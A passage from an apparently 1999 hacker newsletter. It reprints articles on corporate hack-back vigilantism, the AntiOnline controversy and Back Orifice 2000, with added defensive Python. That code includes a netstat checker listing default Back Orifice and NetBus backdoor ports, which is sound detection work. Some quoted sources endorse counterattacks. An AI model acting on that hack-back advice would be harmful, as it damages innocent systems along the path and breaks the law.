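            plan.append((ip, "rate-limit at perimeter; source unverified, do not target"))
        else:
            plan.append((ip, "log only; single unverified SYN"))
    return plan


if __name__ == "__main__":
    classes = classify_sources(parse_log(SAMPLE_LOG))
    for ip, action in plan_response(classes):
        print(f"{ip:16} {action}")
```

Even a completed handshake identifies only the last machine in the chain, not the person at the keyboard; the dial-up-from-the-phone-box case Martin describes earlier in this issue is exactly what this check cannot rule out, and the hop-by-hop ISP cooperation the article describes is still required beyond it. The flood threshold is also where the 1997 Sprint incident lives: a burst of connections from one address is a reason to throttle and investigate, not to pull routers or return fire.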
Even those with a strong inclination for vigilantism note that counteroffensive
responses are fraught with danger. "Talk to your lawyers," Troy Systems'
Reese advises. "Keep in mind that your strike back has to go through a long
path, and you might do damage at any place along the way." Retribution can
cause a hair-trigger response that could cause damage to systems in the path
from you to the attacker.
"You really have to understand what you're doing," says Ray Kaplan, a senior
information security consultant with Secure Computing. "Your first response
might invite further attack, exactly the opposite of what you intended. You
have to consider your firm's public relations posture and how the Internet
community as a whole will react to your actions."
Don't ask, don't tell
As for how law enforcement will view vigilantism, the answer from many
companies is a resounding, "Who cares?"
Vigilantism is emerging as a response to the intense frustration people feel
with law enforcement authorities they view as simply not up to snuff.
Complaints from top firms in the U.S. range from downright ineffectiveness
("clueless" is an oft-repeated word) to a lack of staff, lack of funding, courts
that are too crowded with cases and the snail-like speed at which typical law
enforcement investigations run.
"One reason you see vigilantism is because law enforcement doesn't get the
job done," says Fred Cohen, president of Fred Cohen and Associates and
principal scientist at Sandia National Laboratories. "Law enforcement might
investigate if you have a lot of political clout and you do all of the leg work."
Companies are also fearful of what might happen if they do bring in law
enforcement. "It's a hell of a situation when victim companies are more fearful
of the FBI than they are of the attackers," says Michael Vlahos, senior fellow
at the U.S. Internet Council. He echoes the worry that sensitive corporate
information will not be protected if handed over to law enforcement.
"Law enforcement is helpless," ISS's Noonan maintains. "It's not like Israeli
fighters who train every day for every contingency. Conventional law
enforcement just can't match the skills needed. Besides, you can't trust law
enforcement to keep your secrets from becoming public knowledge."
Predictably, law enforcement does not favor the vigilante view - at least
publicly. "If someone were to attack us, we are not encouraged to swat back,"
says Lt. Chris Malinowski of the New York Police Department, who
specializes in cybercrime. "If companies take any of these proactive defensive
steps, they are taking a big chance, subject to criminal prosecution."
Dave Green, deputy chief of the Computer Crimes and Intellectual Property
Section for the U.S. Department of Justice, says he relates to the frustration
over law enforcement's inability to respond, but adds that his department can
only recommend protective measures. Yet he stops short of advising against
corporate vigilantism outright. When asked if companies should hack back at
attackers, Green responds, "no comment," as he does to questions as to what
could legally be considered an attack. "But I can say that law enforcement is
gearing up and is much better equipped to deal with cybercrime," he adds.
When they are not speaking for attribution, law enforcement authorities of all
stripes go further than Green. Local police, state police, the FBI, Secret
Service, Interpol and Scotland Yard members all say the same thing -
unofficially: "We can't handle the problem. It's too big. If you take care of
things yourself, we will look in the other direction. Just be careful."
Security consultant Lobree seems to understand the police mentality and
applies the red light theory to cybervigilantism. "Suppose it's the dead of night
on a country road, and you come upon a stop light. You can see for miles in all
directions. Are you going to run the light even knowing there is virtually no
chance of being caught?" Some, perhaps most, won't, because they have an
innate fear of being caught. Others will forge ahead. "A lot of companies
recognize that the chance of getting caught in a vigilante cyberstrike is pretty
darn low," he says.
It's your call
A number of sources suggest vigilantism might be a business opportunity for a
firm that wants to specialize in counteroffensive network security. "In the
1860s, law enforcement was conducted by Pinkerton, a private company,"
Vlahos says. Many suggest that privatization should be the case in the
cyberworld as well. The kind of offensive network security products needed
to make it happen are starting to find their way into corporate tool kits and
onto the Internet.
But the legal challenges that coexist with hostile perimeters and
counteroffensive measures are daunting. The astute company will examine
every aspect of its posture before marching down the slippery slope of
vigilantism. Sometimes the best defense is not to overreact. In the worst case,
do nothing until a proper response can be developed. Vlahos says courts may
be the place to create new laws more attuned to the technology. "This is a
whole new arena, and I don't know how we can explore it without trying new
approaches, even if they are technically illegal."
Cipher, the baseball-bat-bearing vigilante, is all for new approaches. "Personal
persuasion is always more effective than electronic persuasion," he says.
"Personal persuasion virtually guarantees that a hacker will see the error of his
ways, scamper to please and turn over a new leaf."
No matter what path you choose, make sure it is well thought out and that you
have your legal ducks in a row. You just might need them.
Schwartau is chief operating officer of The Security Experts, a global
security consulting firm, and president of infowar.com. He can be
contacted at winn@infowar.com.
@HWA
20.0 Forbes Calls AntiOnline Bluff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by grendel
Adam Penenberg takes a close look at John Vranesevich,
founder and web master of AntiOnline. The article offers
a close examination of previous threats of litigation by
Mr. Vranesevich and discovers just how easy it is to
become a 'reliable media source'. Mr. Penenberg calls his
bluff and issues a challenge to 'Go Ahead and Sue'.
Forbes
http://www.forbes.com/columnists/penenberg/
(articles change daily, check the archives... -Ed)
CyberWire Dispatch August 1999 - Referred to in Forbes Article
http://www.hackernews.com/orig/CWD0899.html
Ottawa Citizen - Mirror Referred to in Forbes Article
http://www.attrition.org/negation/ottawa.html
Forbes;
IT'S A SAD FACT, but whenever someone is cited as an expert in one publication, he is almost sure to be
quoted in another--and another and another. The reason is simple: The first thing a journalist does when
beginning a story is to see what else has been written on the topic. Culling sources from other news
articles is a good way to get started.
The problem is, few reporters check out these "experts," figuring that if a source made it into, say,
The New York Times or The Washington Post, he must be reliable and, well, expert. Think of it as an
extension of Howard Stern's media strategy. Stern once said he himself first coined the term "King of All
Media," figuring that the mainstream press would then start to call him that. (It did.)
How else to explain the schizophrenic emergence of twenty-year-old John Vranesevich, founder and operator
of antionline.com, a web site that purports to follow the hacker scene. In the realm of mass media, "JP"
has become a star, a youthful public figure who has been quoted extensively for his computer-security
expertise and inside knowledge of the hacking world.
But in hacker circles he is a pariah. Perhaps only his close ally, Carolyn Meinel (a.k.a. "The Happy Hacker"),
inspires more vitriol. At this year's Defcon, the hacker conference held in Las Vegas, Meinel had the dubious
honor of being bodily ejected from the convention hall.
It's hard to gauge just how elite JP's hacker and computer-security skills are. But we do know his web site was
taken down in August when someone with an account in Russia tricked AntiOnline into downloading software that
redirected its visitors to another site. The hacker, obviously not a fan of JP's, included this message:
"Expensive security systems do not protect from stupidity."
And online columnist Lew Koch, of CyberWire Dispatch, interviewed JP at length, exposing vast gaps of knowledge.
For instance, Koch questioned JP about AntiOnline's alleged scoop of the hack of an atomic research center last
year, yet he couldn't remember which country housed the center. JP kept insisting it was Israel, and, according
to Koch, called the Bombay Atomic Research Center the "B'Hadvah Atomic Research Center." When Koch corrected
him, JP admitted it must have been India. JP also claims he has "semi-contractual" relationships with NASA and
the Defense Information Systems Agency (DISA), yet Koch says both agencies deny this.
But the mass media appears ignorant of this. The New York Times turned to Vranesevich when it needed comment on
a rash of anti-government hacks, while The Wall Street Journal Europe dubbed him an "online-security specialist."
The Baltimore Sun asked for his opinion on the hack of the Johns Hopkins' medical school site. The Orange County
Register invited him to bash hacker/martyr Kevin Mitnick, which he did with glee, saying that hackers don't have
a clue about Mitnick's case, they "just heard it's cool to support Mitnick, and that is what they do." And the
San Diego Union-Tribune dialed him up to ask about the threat of computer viruses.
Of course, JP has nothing against good press. It's the bad press that lets him unsheathe his sharpest weapon. No,
not the facts; those would only get in the way. We're talking about the threat of a lawsuit.
In June, JP contacted Harvard University to complain about a computer-security web site rival called PacketStorm,
which had posted some nasty pictures, along with even nastier commentary. Harvard, afraid of a lawsuit, pulled the
site, which was a favorite of computer-security professionals. JP claims on his web site that he didn't explicitly
threaten lawsuit, but the University certainly took it that way. A Harvard spokesman told me this was the first
time Harvard had ever pulled the plug on a site for "objectionable material." (Eventually, PacketStorm found a home
with Kroll-O'Gara, the big-time detective agency in New York.)
Then in July, The Ottawa Citizen ran a story about JP, reporting allegations that JP is under investigation by the
FBI for "employing hackers to target high-profile sites in order to scoop the rest of the media with exclusive
reporting." Vranesevich contacted the newspaper and threatened to sue. Although Mark Anderson, The Citizen's high
tech editor, said he was confident in the story, the FBI would not comment whether it was in fact investigating JP
or not, even though several other sources in the know insisted he was. As a result, the Citizen removed the story
from its web site, rather than face a potential lawsuit.
"It's sad," Anderson says. "You're confident you have reliable information, but the threat of a lawsuit forces you
to pull your story. The onus was on us to prove that Vranesevich is under investigation by the FBI, but the FBI
wouldn't say it outright. Since Canadian libel law is tougher than American libel law, we felt we had no choice."
In addition, folks trolling around cyberspace say that Vranesevich has threatened them with lawsuits whenever they
post anything negative about him on their web sites. I wonder what he would do if someone actually took him up on
this, since lawyers are expensive and, by all accounts, JP's business is far from being a cash cow. Perhaps, after
reading this, he'll even sue me.
CyberWire Dispatch;
Note: CyberWire Dispatch is a mailing list only newsletter.
It is reprinted here with permission. Subscription
information is at the end.
CyberWire Dispatch // August 1999
// All Rights Reserved
Jacking in from the "Pine-Sol" port:
By Lewis Z. Koch
CWD Special Correspondent
Twenty-year-old John Vranesevich calls his AntiOnline
Web site "a valuable tool in the fight against 'CyberCrime'"
In a call to arms, this self-anointed, junior G-man
wannabe, promises to uncover, reveal and inform on
hackers and other miscreants.
Out of this misguided cyber-vigilantism, arises the
"denunciator" virus, which reaches its full lethality in
totalitarian states but also finds a home in democratic
societies as well, usually in climates of social resentment,
political fanaticism, or, my personal favorite, political
self-righteousness.
The Denunciator virus, known also as the "Accuser" virus,
destroys careers, leaves permanent scars, called
"blacklists," gives rise to false alarms, warnings or
contrived "cautionary tales" meant to lull or divert
citizens. The natural host for this virus is believed to be a
species of the rodent called a "snitch," aka squealer, stool
pigeon, informer; rat bastard.
Every delusional crusader needs a mission statement,
Vranesevich is no different. This self-anointed
sheriff-of-cyberspace pens this Uber-warning to hackers:
"I know that some of you are playing what you feel is a
game. A game that you think you are winning. Some of
you sit back and laugh at organizations like the FBI. You
make sure that you provide enough information to make it
obvious who you are, yet are careful not to provide
enough information to actually have it proven. I have
been watching you these past 5 years. I know how you
do the things you do, why you do the things you do, and I
know who you are."
And if you're keeping score-and you should be-you'll note
that Vranesevich apparently started down this crusader
road at the tender age of 15 or just about the time he
figured his Johnson could be used for more than simple
utilitarian bodily functions.
This not-very subtle paean to cyber-vigilantism could
easily be dismissed save for the fact that Vranesevich
has earned a demi-celebrity status from journalists
working for publications from which we have come to
expect more judicious sourcing, including, but not limited
to, Matt Richtel of The New York Times, John Schwartz of
The Washington Post and even, sadly, CWD's own Brock
Meeks while cloaked in his alter-ego as Washington
correspondent for MSNBC.
And we wonder why fewer and fewer people trust the
media.
Hung With His Own Rope
=====================
In his mission statement Vranesevich unequivocally
states, "I've seen myself talking with people who have
broken into hundreds of governmental servers, stolen
sensitive data from military sites, broken into atomic
research centers."
Question is, can we believe him?
There's his rather perplexing story about hackers breaking
into an "Israeli" atomic research center.
At first, as Vranesevich tells it, when hackers told him
what they had done, he "freaked" even thought the boast
might be "far fetched." But these hackers sent him a
"folder full of documents written in a foreign language"
they claimed they had copied from the "B'Hadvah" Atomic
Research Center. [Note: Vranesevich didn't know how to
spell the name of the so-called research center].
"Were the documents in Hebrew or English?" I asked.
"Bengali."
When he broke the "story" on his AntiOnline web site, all
media hell broke loose.
"Every mainstream media started calling and questioning
and calling the research center," Vranesevich said. "I had
all these nuclear arms proliferation people calling. Here I
am in my parent's living room, and one day, thirteen calls
from anti-nuclear proliferation and pro-nuclear proliferation
(sic) groups wanting to know - is this significant, what is
Israel doing?"
I was still having a problem with the "Bengali" aspect to
the documents.
"Ah, John," I asked, "is this an Israeli research center or
could it be Indian? Pakistani?"
Silence. Then Vranesevich said, "I think it's Indian. Who
was the one that just did the nuclear testing?"
"That was India and Pakistan, not Israel."
"Oh, then this was India, not Israel."
Oh.
Then there's his story about changing medical
records-pretty serious stuff. Can we take him at his word
there?
"[I]'ve seen people change the medical records of
individuals in our armed services" Vranesevich asserts in
his "mission" statement.
When asked about these nefarious deeds, Vranesevich
works himself up into a high dudgeon about hackers
breaking into sites and changing medical records.
"What would have happened if medical records had been
changed and a cancer patient received the wrong
treatment for it?...What if I had looked into who these
[hacker] guys were, a little further? What would have
happened if I would have published the story? What would
have happened if CERT had come out and said medical
records had been changed and a cancer patient received
the wrong treatment because of it!"
I questioned him closely. "You really saw people change
the medical records of individuals in our armed forces?"
"I don't mean that literally," backtracking as fast as his
voice could carry him. "You see the language I was using?
I don't mean literally 'I saw them do it, I saw it happen.'
It's something that transgressed (sic) before. It's like we
saw our country go through three wars. It doesn't mean I
caused (sic) the three wars. You see what I'm saying? Or
I've seen crime happen over and over again in my
neighborhood. Doesn't mean I literally saw it. You know
what I mean? I don't know if I'm making myself clear." Ah,
er.. right. He gave it one more chance.
"Looking back in retrospect (sic). It was like actions that
transgressed (sic) before. I've sort of watched the events
transfold (sic) before my eyes."
Yep, that clears it up; someone get this guy an English
tutor...There's more like that but after a while it gets,
well, boring.
Vranesevich also claims a "semi-contractual" relationship
with all kinds of official military and police types, including
one with the NASA and one with the Defense Information
Systems Agency (DISA).
Can we believe him?
NASA says no. After checking with their databases "they
could find no record of NASA having done business with
Mr. Vranesevich or his company AntiOnline," reports
Patricia M. Riep-Dice, NASA Freedom of Information Act
Officer.
According to a DISA spokesman, no such relationship
exists. None. Nada.
In Other People's Words
=======================
In his grasp for distinction, celebrityhood, acclaim,
Vranesevich overreaches, as he did with his claim of
unethical behavior on the part of computer security expert
Marcus Ranum. Ranum's "crime"? "Guilt-by-association"
with two hacker groups, L0pht Heavy Industries and Cult
of the Dead Cow (cDc).
L0pht Heavy Industries is among the finest Microsoft
error-catchers in the world; it is a company with
employees and it pays taxes. "Cult of the Dead Cow" is a
group of hackers in the tradition of Yippie founders Abbie
"Steal This Book" Hoffman and Jerry Rubin.
The cDc promises Internet chaos, anarchy and terror; in
1968, in Chicago, Abbie Hoffman and Jerry Rubin
threatened to pour LSD in the water and send Yippie
studs to O'Hare airport to seduce the wives of delegates
to the Democratic National Convention. If that analogy is
lost on you, cut your losses now, stop reading and return
to your "Internet for Dummies" workbook.
L0pht and cDc tend to despise Microsoft, but then so do a
lot of people, including folks in the Justice Department.
More than likely there is cross-over contact between
L0pht and cDc since the two have much in common, in
the same way journalists from different newspapers and
television tend to hang out at the same bars, buy each
other drinks and complain about stupidity and venality of
their editors.
cDc had been tinkering around the multiplicity of holes,
vulnerabilities and general screw ups in the Microsoft
Windows operating system. They developed a
back-dooring program for Win 95, one that allowed a
Trojan Horse to exploit that vulnerability.
In a stroke of genius that would make a Wizard of
Madison Avenue green with envy, they dubbed the
program "Back Orifice."
Ranum developed a program to counteract Back Orifice
and called it "Back Officer Friendly." Vranesevich claims he
was "shocked, shocked" to discover that Ranum might
have had conversations with hackers at L0pht, perhaps
even some at cDc about Back Officer Friendly.
Vranesevich's story alleged that Ranum could have even
been talking with the very people at cDc who developed
the exploit in the first place. So what do we have here?
Collusion? Duplicity? Ethical lapse? Double-agentry?
Whom to believe?
================
Bell Labs' William R. Cheswick, co-author with Steven
Bellovin of the exemplary "Firewalls and Internet Security -
Repelling the Wily Hacker," says of Ranum: "I have worked
with Marcus for years. He is a strong force for Good
against Evil. A security person is paid to think bad
thoughts, and Marcus is quite good at it. The key is that
he doesn't do the bad stuff, but uses this approach to
make things safer."
Bellovin, himself a world-class computer expert, certainly
doesn't equivocate. Ranum has "been a strong, positive
force for Internet security, both in the sense of building
useful tools and in the sense of teaching other people
important principles. I've also never heard any serious
question about his ethics."
"Marcus has one of the most fluent understandings of
Internet security I have ever seen," says Bruce Schneier,
whose books on encryption and on privacy can trigger a
physical and intellectual hernia, "his ability to see threats
and attacks, defenses and countermeasures, makes him
one of the most valuable resources we have in computer
security world," Schneier said. Marcus' "association with
the L0pht recognizes that there is considerable expertise
in the hacking community that can be leveraged in the
fight against computer crime. Marcus is just smarter than
other people, because he realized it and figured out how
to use it. No kidding; he's that good."
So you do the math: self-appointed cybervigilante John
Vranesevich, with his stolen "Israeli" atomic secrets
written in Bengali, changed medical records that weren't
changed, unsubstantiated relationships with NASA and
DISA (and that's just for openers), and, on the other
hand, Marcus Ranum and people like Cheswick, Bellovin,
and Schneier.
The best way to deal with the "Denunciator" virus is simply
silence; don't feed the hype.
========================================
EDITOR'S NOTE: CyberWire Dispatch, with an Internet
circulation estimated at more than [500,000], is now
developing plans for a once-a-week e-mail publication.
Every week, one of five well-known investigative reporters
will file for CWD. If you think your company or organization
would be interested in more information about establishing
a sponsorship relationship with CyberWire Dispatch,
please contact Lewis Z. Koch at lzkoch@wwa.com.
===================
To subscribe to CWD, send a message to:
Majordomo@vorlon.mit.edu
No subject needed.
In the first line of the message put:
Subscribe CWD
To remove yourself from this list, send a message to:
Majordomo@vorlon.mit.edu
No subject needed.
In the first line of the message put:
Unsubscribe CWD
----
From: http://www.attrition.org/negation/ottawa.html
Ottawa Dispatch;
[There is a chance this article was removed because of the
legal threats made by John Vranesevich against the Ottawa
Citizen. It is preserved here for posterity.]
http://www.ottawacitizen.com/hightech/990719/2623591.html
The Ottawa Citizen Online Business Page
Monday 19 July 1999
Spy vs. spy in the hacker underworld
Network security expert is under investigation for attacks on U.S. government Web sites
Bob Paquin
The Ottawa Citizen
In the murky world of hackers and crackers, appearances can be deceptive. "White hat" good guys,
working for software or security firms, have occasionally been caught moonlighting as "black hat"
rogues.
Such appears to be the case with John Vranesevich, a network security expert and founder of top-rated
hacker Web site AntiOnline. Mr. Vranesevich is currently under investigation by the FBI with regard
to recent attacks on U.S. government Web sites. It is alleged that he may have employed hackers to
target high profile sites in order to scoop the rest of the media with exclusive reporting.
Mr. Vranesevich has denied the allegations.
Brian Martin, also under FBI investigation for hacking, recently released a report on his Web site
(www.attrition.org/negation/special) which details a series of links between Mr. Vranesevich and an
alleged member of the hacker group Masters of Downloading, which claimed responsibility for the U.S.
Senate Web site hack earlier this month.
Mr. Martin, who researches hacker culture through his Web site, claims to have been tracking
questionable AntiOnline reporting over the past year.
Mr. Vranesevich, 20, has over the past couple of years become one of the most widely quoted and
authoritative sources on hacking and security-related information. Begun in late 1994 as a 5-megabyte
high school hobby Web site, AntiOnline has since grown into a multi-domain business venture.
ABC News has described it as a "Rick's Cafe in the Casablanca world of hacking." Besides reporting on
hacking news, the site offers a downloadable library of hacking software tools, archives of several
hacker newsletters and journals, and copies of some of the hacked pages featured in reported stories.
While growing increasingly popular with the mainstream media, however, Mr. Vranesevich has slowly
built up a number of enemies among the hacker underground.
Spurred, perhaps, by an extensive FBI and U.S. Department of Justice hacker crackdown, which resulted
in raids on 20 suspected hackers across six states, Mr. Vranesevich declared a dramatic change of
stance, distancing himself from the subjects he covers.
In a "Change in Mission" notice posted on his Web site, Mr. Vranesevich said: "Unfortunately, I've
found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself
talking with people who have broken into hundreds of governmental servers, stolen sensitive data from
military sites, broken into atomic research centres, and yes, people who have even attempted to sell
data to individuals that presented themselves as being foreign terrorists ... Many times, I knew about
these instances before hand, and could have stopped them."
He also claimed to have been secretly working with the U.S. Airforce to develop a "profile of a
hacker" for use in fighting "CyberCrime".
Mr. Vranesevich's message concluded with a note to the thousands of hackers who read his site: "You
yell and scream about freedom of speech, yet you destroy sites which have information that disagree
with your opinions.ÊYou yell and scream about privacy, yet you install trojans into others' systems,
and read their personal email and files. You truly are hypocrites.ÊAll of these grand manifestos that
you develop are little more than excuses that you make up to justify your actions to yourself."
Mr. Martin, on the other hand, alleges that many of the reports from AntiOnline, and subsequent
follow-on reporting in other media outlets, have been exaggerated and sensationalized.
"Not only had AntiOnline driven the media hype behind the stories, they put various government and
Department of Defense organizations on full alert preparing for the fallout these attacks would
cause," he states on his own Web site.
In detailing the relationship between Mr. Vranesevich and the alleged hacker in question, Mr. Martin
notes that "the typical journalist/contact relationship did not exist, and in fact, AntiOnline may
have been responsible for creating some of the news to report on ... he pays people to break into sites
in order to report on it as an exclusive."
@HWA
21.0 BO2K, good or evil? The Debate Continues.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by bradcc
Bruce Schneier, chief technology officer at Counterpane
Internet Security, offers some comments on Back Orifice
2000. Is it an evil 'hacker tool' or remote administration
software?
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,13024,00.html
How Bad Is Back Orifice?
Hacker tool is only as malicious as the hands it
falls in--but Windows users beware.
by Ann Harrison, Computerworld
September 28, 1999, 8:22 a.m. PT
Is Back Orifice simply a cool hacking tool or a
malicious weapon? Depends on who you ask. Some
people think the remote administration tool for
Microsoft Windows is not as malicious as it's made out
to be. Bruce Schneier, chief technology officer at
Counterpane Internet Security, is one of them.
Computerworld reporter Ann Harrison spoke with him
recently about the free open source tool, which he
insists has gotten an undeservedly bad reputation.
Q: How does BO2K work?
A: There are two parts: a client and a server. The server
is installed on the target machine. The client, residing
on another machine anywhere on the Internet, can now
take control of the server.
Perfectly respectable programs, like pcAnywhere or
Microsoft's Systems Management Server [SMS], do
the same thing. They allow a network administrator to
remotely troubleshoot a computer. If the server is
installed on a computer without the knowledge or
consent of its owner, the client can effectively "own"
the victim's PC.
Q: Why has BO2K acquired a reputation as only a
hacker's tool?
A: Back Orifice's difference is primarily marketing spin.
Since it was written by hackers, it is evil. That's wrong;
pcAnywhere is just as much an evil hacking tool as
Back Orifice. Not only can the client perform normal
administration functions on the server's computer, but it
can also do more subversive things: reboot the
computer, turn the microphone or camera on and off,
capture passwords.
Q: How does BO2K run in stealth mode?
A: Unless the server's owner is knowledgeable, and
suspicious, he will never know that Back Orifice is
running on his computer. Other remote administration
tools, even SMS, also have stealth modes. Back
Orifice is just better at it. Back Orifice will be used by
lots of unethical people to do all sorts of unethical
things.
Q: Back Orifice can't do anything until the server
portion is installed on some victim's computer, right?
A: Yes. This means that the victim has to commit a
security faux pas before anything else can happen. Not
that this is very hard; lots of people network their
computers to the Internet without adequate protection.
Still, if the victim is sufficiently vigilant, he can never be
attacked by Back Orifice.
Q: What about Microsoft?
A: One of the reasons Back Orifice is so nasty is that
Microsoft doesn't design its operating systems to be
secure. It never has. You have to make 300-plus
security checks and modifications to Windows NT to
make it secure. Microsoft refuses to ship the [operating
system] in that condition.
Malicious remote administration tools are a major
security risk. What Back Orifice has done is made
mainstream computer users aware of the danger. There
are certainly other similar tools in the hacker world,
some developed with much more sinister purposes in
mind.
Microsoft responds to security threats only if they are
demonstrated. Explain the threat in an academic paper
and Microsoft denies it; release a hacking tool like
Back Orifice and suddenly they take the vulnerability
seriously.
For more enterprise computing news, visit
Computerworld Online. Story copyright 1999
Computerworld Inc. All rights reserved.
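Schneier's point that the BO2K server is an ordinary listening service, stealthy or not, suggests the first triage check an administrator can run. What follows is an added example, not code from Computerworld, Schneier or the cDc: it parses output in the style of `netstat -ano` (the PID column arrived with later Windows versions; the sample below is constructed, not captured from a real machine) and flags listeners on the ports these tools used by default. The port table is my own notes rather than figures from the article and should be checked against each tool's documentation. BO2K's port is configurable and a server can be hidden from the task list, so a miss proves nothing; a hit gives you a process ID to go and look at.

```python
import re
from collections import namedtuple

# Default listening ports historically used by these remote-administration
# tools. Assumption of this example (the author's notes, not figures from
# the article); every one of them is configurable, so a hit is an
# indicator to investigate, not proof of compromise.
KNOWN_BACKDOOR_PORTS = {
    ("udp", 31337): "Back Orifice (1998)",
    ("tcp", 54320): "Back Orifice 2000",
    ("udp", 54321): "Back Orifice 2000",
    ("tcp", 12345): "NetBus",
    ("tcp", 12346): "NetBus",
}

Listener = namedtuple("Listener", "proto port pid")

# Constructed 'netstat -ano'-style output, one socket per line. Windows
# prints LISTENING for bound TCP sockets and '*:*' as the UDP peer.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       800
  TCP    0.0.0.0:54320          0.0.0.0:0              LISTENING       1204
  TCP    192.168.1.5:1027       10.0.0.7:80            ESTABLISHED     1460
  UDP    0.0.0.0:31337          *:*                                    1204
  UDP    0.0.0.0:137            *:*                                    4
"""

_LINE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+"
    r"(?:\s+(?P<state>[A-Z_]+))?\s+(?P<pid>\d+)\s*$"
)


def parse_listeners(netstat_text):
    """Return a Listener for every socket that accepts inbound traffic."""
    found = []
    for line in netstat_text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # header line or something we do not understand
        proto = m.group("proto").lower()
        # A TCP socket only matters when it is LISTENING; a bound UDP
        # socket is always reachable, so it is kept unconditionally.
        if proto == "tcp" and m.group("state") != "LISTENING":
            continue
        found.append(Listener(proto, int(m.group("port")), int(m.group("pid"))))
    return found


def flag_suspect_listeners(netstat_text):
    """Map each listener on a known default backdoor port to the tool name."""
    hits = {}
    for listener in parse_listeners(netstat_text):
        name = KNOWN_BACKDOOR_PORTS.get((listener.proto, listener.port))
        if name:
            hits[listener] = name
    return hits


if __name__ == "__main__":
    for listener, name in flag_suspect_listeners(SAMPLE_NETSTAT).items():
        print("%s/%d owned by PID %d looks like %s"
              % (listener.proto, listener.port, listener.pid, name))
```

On a live host, feed it the real output with `flag_suspect_listeners(subprocess.check_output(["netstat", "-ano"], text=True))`, then confirm by inspecting the process that owns the socket; a listener on an unexpected port with no name you recognise deserves the same look even when it is not in the table.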
@HWA
22.0 97bit ECC Stronger than 512bit RSA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
A group of international researchers, using
approximately 195 computers from all over the world,
after 40 days of computation, has been awarded 1st
prize in the latest round of the Certicom ECC Challenge
for successfully recovering a 97-bit ECC key. Results
bolster Certicom, ANSI X9, and NIST's recommendation
that strong security can only be achieved by using a
minimum of a 163-bit ECC key. Furthermore, the result data
show that 97-bit ECC is harder to crack than
512-bit RSA, which can still be found in many
commercial products today.
Computer World
http://www.computerworld.com/home/news.nsf/all/9909282ellip
(Online News, 09/28/99 12:00 PM)
Global team cracks crypto
challenge
By Stacy Collett
An Irish mathematician and his team have cracked the
seventh and toughest encryption problem as part of a
challenge by Canadian firm Certicom Corp. to prove that
one type of encryption is tougher to break than another.
The challenge involved 97-bit elliptic curve cryptography vs.
512-bit RSA (Rivest-Shamir-Adleman), a more common
encryption method.
The solution was discovered by 195 volunteers in 20
countries after 40 days of calculations on 740 computers,
Irish mathematician Robert Harley said in a statement.
Solving the problem used approximately 16,000 MIPS-years
of computing, twice as much as solving a 512-bit RSA
problem, officials said. One MIPS-year is the computing
power of one system that can crunch a million instructions
per second running for a full year.
The team concluded that the elliptic curve encryption was
tougher to crack, but debate continues within the security
community on the issue.
Certicom launched a series of increasingly difficult
cryptography problems in November 1997 with prizes worth
up to $100,000. Andrew Odlyzko, head of mathematics and
cryptography research at AT&T Labs said the test
"demonstrates the need to keep increasing cryptographic
key sizes to protect against growing threats."
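The article reports that the 97-bit curve cost about 16,000 MIPS-years, twice the 512-bit RSA effort, and that the recommended floor is 163 bits; the standard cost models show why a modest increase in ECC key size buys so much more than the same increase in RSA modulus size. What follows is an added worked example, not the Certicom team's or Harley's own code or figures. It uses the textbook Pollard rho estimate for the elliptic-curve discrete logarithm (about sqrt(pi*n/4) group operations for a group of order n) and the asymptotic general number field sieve cost L_N[1/3, (64/9)^(1/3)] for factoring, with the o(1) term dropped. The absolute GNFS figure is therefore far too high at 512 bits, where implementation constants dominate; only the ratios between key sizes should be read from it. The 8,000 MIPS-years for RSA-512 is derived from the article's "twice as much" and is the only input that is not a formula.

```python
import math

LN2 = math.log(2.0)


def log2_pollard_rho_ops(bits):
    """log2 of the expected group operations for Pollard rho against an
    elliptic-curve group of order about 2**bits: sqrt(pi * n / 4)."""
    return bits / 2.0 + 0.5 * math.log2(math.pi / 4.0)


def log2_gnfs_ops(bits):
    """log2 of the asymptotic GNFS cost L_N[1/3, (64/9)**(1/3)] for an RSA
    modulus N of about 2**bits, ignoring the o(1) term. Absolute values are
    rough; differences between sizes are the meaningful output."""
    ln_n = bits * LN2
    c = (64.0 / 9.0) ** (1.0 / 3.0)
    return c * ln_n ** (1.0 / 3.0) * math.log(ln_n) ** (2.0 / 3.0) / LN2


def scale_effort(measured_mips_years, measured_bits, wanted_bits, log2_cost):
    """Extrapolate a measured effort to another key size with a cost model,
    so the model supplies the ratio and the measurement supplies the scale."""
    return measured_mips_years * 2 ** (log2_cost(wanted_bits) - log2_cost(measured_bits))


if __name__ == "__main__":
    # Inputs: the article's 16,000 MIPS-years for ECC-97, and half of that
    # for RSA-512 (derived from "twice as much", not stated directly).
    ecc97_effort, rsa512_effort = 16000.0, 8000.0
    print("ECC-97  rho ops : 2^%.1f" % log2_pollard_rho_ops(97))
    print("ECC-163 rho ops : 2^%.1f" % log2_pollard_rho_ops(163))
    print("RSA-512  GNFS   : 2^%.1f (heuristic)" % log2_gnfs_ops(512))
    print("RSA-1024 GNFS   : 2^%.1f (heuristic)" % log2_gnfs_ops(1024))
    print("ECC-163 scaled from ECC-97 : %.2e MIPS-years"
          % scale_effort(ecc97_effort, 97, 163, log2_pollard_rho_ops))
    print("RSA-1024 scaled from RSA-512: %.2e MIPS-years"
          % scale_effort(rsa512_effort, 512, 1024, log2_gnfs_ops))
```

By these models, going from 97 to 163 bits multiplies the attacker's work by 2^33, while doubling an RSA modulus from 512 to 1024 bits multiplies it by roughly 2^23. That asymmetry is the whole argument for the 163-bit floor, and for the observation that ECC key sizes grow slowly as security requirements rise while RSA moduli have to grow much faster.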
@HWA
23.0 DOE Loses Dough to Budget Cut
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Ted
An energy appropriations bill passed yesterday by the
Senate omits $35 million requested by the Department
of Energy for cyber security. The $35 mil was to be
used for real time intrusion detection for 70 Energy
Department sites. Members of the Senate said they
want management reform first, then they will approve
funding.
Washington Post
